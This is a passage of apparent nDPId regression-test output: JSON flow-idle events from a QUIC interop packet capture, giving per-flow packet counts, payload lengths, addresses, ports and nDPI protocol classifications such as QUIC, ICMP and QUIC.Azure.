dpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
-00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434629,"flow_last_seen":1603816434766,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434657,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00764{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434670,"flow_last_seen":1603816434802,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434542,"flow_last_seen":1603816444513,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434794,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434569,"flow_last_seen":1603816444507,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434855,"flow_last_seen":1603816434997,"flow_idle_time":120000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.Azure","breed":"Acceptable","category":"Network"}}
-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434584,"flow_last_seen":1603816434709,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434664,"flow_last_seen":1603816444508,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434628,"flow_last_seen":1603816435041,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00753{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434722,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434601,"flow_last_seen":1603816435020,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434659,"flow_last_seen":1603816434682,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434766,"flow_last_seen":1603816435089,"flow_idle_time":120000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2662,"flow_avg_l4_payload_len":665,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00764{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434586,"flow_last_seen":1603816434622,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434721,"flow_last_seen":1603816435054,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2590,"flow_avg_l4_payload_len":647,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
-00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434548,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434590,"flow_last_seen":1603816434688,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00763{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434677,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434684,"flow_last_seen":1603816435089,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00760{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434652,"flow_last_seen":1603816434749,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00756{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434707,"flow_last_seen":1603816435089,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434641,"flow_last_seen":1603816435089,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434886,"flow_last_seen":1603816435111,"flow_idle_time":120000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434606,"flow_last_seen":1603816444569,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434519,"flow_last_seen":1603816434551,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434743,"flow_last_seen":1603816444721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434721,"flow_last_seen":1603816444586,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434756,"flow_last_seen":1603816444721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434670,"flow_last_seen":1603816435086,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
